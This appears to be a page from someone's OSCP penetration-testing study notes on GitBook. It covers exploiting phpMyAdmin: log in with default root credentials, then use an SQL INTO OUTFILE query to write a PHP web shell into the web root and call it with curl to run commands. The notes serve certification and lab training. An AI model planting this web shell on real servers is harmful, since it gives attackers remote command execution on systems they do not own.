O
O
OSCP Notes
Search
⌃K
Introduction
Port scanning
Passive Information Gathering
Ports enum:
Recon Tools
Tech Skills Needed
msfvenom
meterpreter commands
Web Apps
General methods
phpmyadmin
cgi priv esc
Phreesoft 5.2.3
Webmin
ColdFusion 8
Wordpress
Mysql commands
xampp
Elastix
Drupal (CMS)
SQL & LFI
LFI
RFI
wfuzz
Manual SQL injection
Port Swigger SQL
php hacks
XSS
XML file upload RCE
Postgress creds found?
mongo db creds found?
base64 encoded Web bruteforcing
Web app source
uploading img as php
iframe technique
python scripts
Windows hacks
Port Forwarding
Reverse shells
Binary exploitation
Transfering Modules
Buffer Overflow
Cracking!
shellshock
Active Directory
Antivirus Evasion
Windows Priv Esc
Linux Priv Esc
Active Directory Case Studies
Pivoting
C program analysis
Misc
Hack the box Write-ups
THM Offensive Security Path
Proving Ground
Cyber Sec Labs
Powered By GitBook

phpmyadmin

if you get logged in with default creds(username:root, no-pass),
you might try running the following in the SQL query
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/cmd.php'
and run
curl "http://127.0.0.1:8080/cmd.php?cmd=whoami" --proxy 192.168.120.223:3128
or
visiting the url directory from web
Previous
General methods
Next
cgi priv esc
Last modified 10mo ago
Copy link